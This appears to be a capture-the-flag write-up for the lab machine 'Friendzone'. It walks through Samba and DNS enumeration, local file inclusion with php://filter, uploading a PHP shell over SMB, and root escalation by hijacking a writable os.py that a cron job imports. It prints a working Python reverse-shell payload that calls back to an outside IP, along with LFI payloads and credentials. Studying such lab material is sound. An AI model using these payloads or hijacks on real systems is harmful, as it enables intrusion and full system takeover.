🟢Friendzone

SAMBA | DNS ZONE TRANSFER | LFI | FILE UPLOAD USING SAMBA | MYSQL CREDENTIALS | CONFIG FILE | PYTHON LIBRARY HIJACKING

Recon & Enumeration

port scan

21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2
80/tcp  open  http        Apache httpd 2.4.29
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X
443/tcp open  ssl/http    Apache httpd 2.4.29 <commonName=friendzone.red>
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu

directory scan

/wordpress
/server-status

http://friendzone.red

Just a basic web page , nothing here But there is a " Email us at: info@friendzoneportal.red " , we can use "riendzoneportal.red" for further enumeration

https://friendzone.red

just a gif , nothing informational

/wordpress

Forbidden <not-useful>

Samba Enumeration

I tried listing files & anonymous login ....... and succeded , their is file present in "general" directory which contains "creds.txt" , i got credentials for admin user i tired them in ssh , ftp .... and failed Lets enumerate samba more

nmap --script smb-enum-shares.nse -p 445 10.10.10.123

and after the recon , i get to know the path of all directories and filles in samba , i will focus on those directires which are benificial for me

\\10.10.10.123\Development:
Path: C:\etc\Development

\\10.10.10.123\general:
Path: C:\etc\general

DNS Zone Transfer

Listing all domains for both "friendzone.red" & "friendzoneportal.red" and then add all the domains in /etc/hosts file

host -l friendzone.red 10.10.10.123
&
host -l friendzoneportal.red 10.10.10.123

At first i opened all domains with http ....but they return the same page which i found on port 80 then i open all of them with https:// , and i get alot of domains which are working but their are 2 domians through which i used solved the box https://administrator1.friendzone.red/ >> login page https://uploads.friendzone.red/ >> has upload functionality

https://administrator1.friendzone.red/

i first tried incorrect creds and got response "wrong" then i used creds , found in samba and got login and the page says "login success please visit dashboard.php"

/dashboard.php

the page says visit "image_id=a.jpg&pagename=timestamp" , and in response i get a picture and timestamp number , i think its vulnerable to LFI

https://uploads.friendzone.red/

I upload a php shell on this , and its succesfully uploaded , time for LFI , i already have 2 parameters :-

LFI

/dashboard.php?image_id=a.jpg&pagename=timestamp

LFI in image_id

i changed the value to a.jpg => shell.php but no reverse shell then i tried again n agian, but didn't get anything ..... thats weird

directory scan

/login.php
/dashboard.php
/images
timestamp.php

/images their only 2 images here , a.jpg and b.jpg it means my shell was not uploaded here , maybe their is any other directory where my shell is uploaded

LFI in pagename

then only option left is this , lets change the value with the directories and file name found in scan timestamp > response shows the timestamp number login > response shows "wrong" i guess , its reflecting the content of the page-name inserted here , i think its vulnerable to LFI to get sure i am going to request the "php source code file" payload :-

pagename=php://filter/convert.base64-encode/resource=dashboard

i got dashboard source-code , we can also request php source-code for
login
upload
timestamp

shell as www-data

After reading the source-code of dashboard , i get to know that the parameter "pagename" is taking the value and adding a ".php" after the value and then shows the content of that particular file I tried pagename=../../../../etc/passwd and fail , =/etc/passwd still fail , i think its bcoz ist adding a ".php" extension in the end of file But after samba enumeration , we know the "Development" & "general" directroy are present in "/etc/" directory Lets make a echo.php file and put it into one of the smb-directory and then try to read it Unfortunately we don't have write permission in "general" , only option left is "Development"

command >>
smbclient -N //10.10.10.123/Development -c 'put echo.php'

In URL >>
pagename=../../../../../../etc/Development/echo
or
pagename=/etc/Development/echo

NOTE :- i did not add echo.php in the payload , as i alerady know that the script do it itself Both payloads are working fine , time to upload a reverse shell and BOOM.......we got the shell

privesc www-data => friends

find a mysql config file in /var/www directory , inside the i got the credentials for user "friend"

db_user=friend

db_pass=Agpyu12!0.213$

we can do both ssh as well as switch user to get a shell as "friend"

privesc friend => root

pspy

after running the script , i found a cronjob which is running a python script :- /opt/server_admin/reporter.py Their is nothing much in the script but it was importing an os library in the script then i start searching "os.py" , in order to perform python library hijacking i found os.py and it is also writable ....great , lets insert reverse shell in bottom of the script- "os.py" NOTE :- I removed the "os" keyword from reverse shell as we already injecting the payload in os.py Orignal payload :-

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()

Modified payload :-

import pty
import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.8",7777))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()

after injecting i waited for few minutes to let the cronjon do it work , and after some time BOOM....... we got the shell as root.